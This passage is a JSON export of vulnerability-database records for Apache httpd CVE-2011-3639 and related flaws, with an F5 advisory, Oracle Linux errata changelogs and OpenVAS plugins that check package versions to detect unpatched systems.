"https://support.f5.com/csp/article/K20979231", "title": "Apache vulnerability CVE-2011-3639", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-27T05:23:16", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. The **Severity **values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability\u00c2 for the ARX system, do not enable the API functionality.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2015-12-29T00:00:00", "published": "2015-12-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/20/sol20979231.html", "id": "SOL20979231", "type": "f5", "title": "SOL20979231 - Apache vulnerability CVE-2011-3639", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:46:54", "bulletinFamily": "unix", "description": "[2.2.3-63.0.1.el5_8.1]\n- Fix mod_ssl always performing full renegotiation (orabug 12423387)\n- replace index.html with Oracle's index page oracle_index.html\n- update vstring and distro in specfile\n[2.2.3-63.1]\n- add security fixes for CVE-2012-0053, CVE-2012-0031, CVE-2011-3607 (#787596)\t\n- remove patch for CVE-2011-3638, obviated by fix for CVE-2011-3639", "modified": "2012-02-28T00:00:00", "published": "2012-02-28T00:00:00", "id": "ELSA-2012-0323", "href": "http://linux.oracle.com/errata/ELSA-2012-0323.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:46:40", "bulletinFamily": "unix", "description": "[2.2.15-15.0.1.el6_2.1]\n- replace index.html with Oracle's index page oracle_index.html\n update vstring in specfile\n[2.2.15-15.1]\n- add security fixes for CVE-2011-4317, CVE-2012-0053, CVE-2012-0031,\n CVE-2011-3607 (#787598)\n- obviates fix for CVE-2011-3638, patch removed", "modified": "2012-02-13T00:00:00", "published": "2012-02-13T00:00:00", "id": "ELSA-2012-0128", "href": "http://linux.oracle.com/errata/ELSA-2012-0128.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:44:34", "bulletinFamily": "unix", "description": "[2.2.15-26.0.1.el6]\n- replace index.html with Oracle's index page oracle_index.html\n update vstring in specfile\n[2.2.15-26]\n- htcacheclean: exit with code 4 also for 'restart' action (#805810)\n[2.2.15-25]\n- htcacheclean: exit with code 4 if nonprivileged user runs initscript (#805810)\n- rotatelogs: omit the second arg when invoking a post-rotate program (#876923)\n[2.2.15-24]\n- mod_ssl: improved patch for mod_nss fallback (w/mharmsen, #805720)\n[2.2.15-23]\n- mod_log_config: fix cookie parsing substring mismatch (#867268)\n[2.2.15-22]\n- mod_cache: fix header merging for 304 case, thanks to Roy Badami (#868283)\n- mod_cache: fix handling of 304 responses (#868253)\n[2.2.15-21]\n- mod_proxy_ajp: ignore flushing if headers have not been sent (#853160)\n- mod_proxy_ajp: do not mark worker in error state when one request\n timeouts (#864317)\n- mod_ssl: do not run post script if all files are already created (#752618)\n[2.2.15-20]\n- add htcacheclean init script (Jan Kaluza, #805810)\n[2.2.15-19]\n- mod_ssl: fall back on another module's proxy hook if mod_ssl proxy\n is not configured. (#805720)\n[2.2.15-18]\n- add security fix for CVE-2012-2687 (#850794)\n[2.2.15-17]\n- mod_proxy: allow change BalancerMember state in web interface (#748400)\n- mod_proxy: Tone down 'worker [URL] used by another worker' warning (#787247)\n- mod_proxy: add support for 'failonstatus' option (#824571)\n- mod_proxy: avoid DNS lookup on hostname from request URI if\n ProxyRemote* is configured (#837086)\n- rotatelogs: create files even if they are empty (#757739)\n- rotatelogs: option to rotate files into a custom location (#757735)\n- rotatelogs: add support for -L option (#838493)\n- fix handling of long chunk-line (#842376)\n- add server aliases to 'httpd -S' output (#833092)\n- omit %posttrans daemon restart if\n /etc/sysconfig/httpd-disable-posttrans exists (#833064)\n- mod_ldap: treat LDAP_UNAVAILABLE as a transient error (#829689)\n- ab: fix double free when SSL request fails in verbose mode (#837613)\n- mod_cache: do not cache partial results (#822587)\n- mod_ldap: add LDAPReferrals directive alias (#796958)\n- mod_ssl: add _userID DN variable suffix for NID_userId (#842375)\n- mod_ssl: fix test for missing decrypted private keys, and ensure that\n the keypair matches (#848954)\n- mod_authnz_ldap: set AUTHORIZE_* variables in LDAP authorization (#828896)\n- relax checks for status-line validity (#853348)\n[2.2.15-16]\n- add security fixes for CVE-2011-4317, CVE-2012-0053, CVE-2012-0031,\n CVE-2011-3607 (#787599)\n- obviates fix for CVE-2011-3638, patch removed", "modified": "2013-02-22T00:00:00", "published": "2013-02-22T00:00:00", "id": "ELSA-2013-0512", "href": "http://linux.oracle.com/errata/ELSA-2013-0512.html", "title": "httpd security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-10-02T14:35:42", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120253", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120253", "title": "Amazon Linux Local Check: ALAS-2012-46", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2012-46.nasl 6578 2017-07-06 13:44:33Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120253\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:21:35 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2012-46\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in httpd. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-46.html\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.22~1.23.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:24:26", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2012-0128", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123992", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123992", "title": "Oracle Linux Local Check: ELSA-2012-0128", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0128.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123992\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:20 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0128\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0128 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0128\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0128.html\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.0.1.el6_2.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:23:41", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2012-0323", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123980", "title": "Oracle Linux Local Check: ELSA-2012-0323", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0323.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123980\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:07 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0323\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0323 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0323\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0323.html\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.0.1.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.0.1.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.0.1.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.0.1.el5_8.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-23T15:17:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-02-27T00:00:00", "id": "OPENVAS:1361412562310870571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870571", "title": "RedHat Update for httpd RHSA-2012:0323-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0323-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00063.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870571\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-27 11:17:07 +0530 (Mon, 27 Feb 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2012:0323-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0323-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1392) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request.\n (CVE-2011-3639)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:25", "bulletinFamily": "scanner", "description": "Check for the Version of httpd", "modified": "2018-01-01T00:00:00", "published": "2012-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870571", "id": "OPENVAS:870571", "title": "RedHat Update for httpd RHSA-2012:0323-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0323-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1392) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request.\n (CVE-2011-3639)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00063.html\");\n script_id(870571);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-27 11:17:07 +0530 (Mon, 27 Feb 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2012:0323-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0323-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:25", "bulletinFamily": "scanner", "description": "Check for the Version of httpd", "modified": "2017-12-27T00:00:00", "published": "2012-07-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881089", "id": "OPENVAS:881089", "title": "CentOS Update for httpd CESA-2012:0128 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2012:0128 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free 